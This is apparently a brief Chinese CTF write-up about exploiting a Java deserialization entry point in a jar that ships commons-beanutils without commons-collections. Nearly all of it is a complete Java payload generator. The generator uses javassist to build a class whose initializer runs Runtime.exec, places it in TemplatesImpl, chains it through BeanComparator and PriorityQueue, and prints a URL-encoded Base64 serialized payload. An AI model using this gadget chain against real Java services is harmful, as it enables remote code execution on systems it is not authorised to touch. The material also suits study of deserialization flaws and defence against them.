看jar包源码
    image.png
    有反序列化入口,然后看pom.xml,只有cb,无cc
    image.png
    考虑P神的无cc依赖的cb链子CommonsBeanutils gadget与不依赖cc的gadget

    1. package com.yq1ng.cb;
    3. import java.io.*;
    4. import java.lang.reflect.Field;
    5. import java.net.URLEncoder;
    6. import java.util.Base64;
    7. import java.util.PriorityQueue;
    9. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
    10. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    11. import javassist.ClassClassPath;
    12. import javassist.ClassPool;
    13. import javassist.CtClass;
    14. import org.apache.commons.beanutils.BeanComparator;
    16. /**
    17.  * @author ying
    18.  * @Description
    19.  * @create 2021-11-30 5:27 PM
    20.  */
    22. public class cb1 {
    23.     public static void main(String[] args) throws Exception{
    24.         ClassPool pool = ClassPool.getDefault();
    25.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
    26.         CtClass cc = pool.makeClass("Cat");
    27.         String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
    28.         cc.makeClassInitializer().insertBefore(cmd);
    29.         String randomClassName = "EvilCat" + System.nanoTime();
    30.         cc.setName(randomClassName);
    31.         //cc.writeFile();
    32.         cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
    33.         byte[] classBytes = cc.toBytecode();
    34.         byte[][] targetByteCodes = new byte[][]{classBytes};
    36.         TemplatesImpl templates = TemplatesImpl.class.newInstance();
    37.         setFieldValue(templates, "_bytecodes", targetByteCodes);
    38.         setFieldValue(templates, "_name", "yq1ng");
    39.         setFieldValue(templates, "_class", null);
    41.         final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
    42.         final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
    43.         // stub data for replacement later
    44.         queue.add("1");
    45.         queue.add("1");
    47.         setFieldValue(comparator, "property", "outputProperties");
    48.         setFieldValue(queue, "queue", new Object[]{templates, templates});
    50.         ByteArrayOutputStream barr = new ByteArrayOutputStream();
    51.         ObjectOutputStream oos = new ObjectOutputStream(barr);
    52.         oos.writeObject(queue);
    53.         oos.close();
    55.         //  不写文件了嗷
    56.         System.out.println(URLEncoder.encode(Base64.getEncoder().encodeToString(barr.toByteArray())));
    57. //        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
    58. //        ois.readObject();
    59.     }
    61.     public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
    62.         final Field field = getField(obj.getClass(), fieldName);
    63.         field.set(obj, value);
    64.     }
    66.     public static Field getField(final Class<?> clazz, final String fieldName) {
    67.         Field field = null;
    68.         try {
    69.             field = clazz.getDeclaredField(fieldName);
    70.             field.setAccessible(true);
    71.         }
    72.         catch (NoSuchFieldException ex) {
    73.             if (clazz.getSuperclass() != null)
    74.                 field = getField(clazz.getSuperclass(), fieldName);
    75.         }
    76.         return field;
    77.     }
    78. }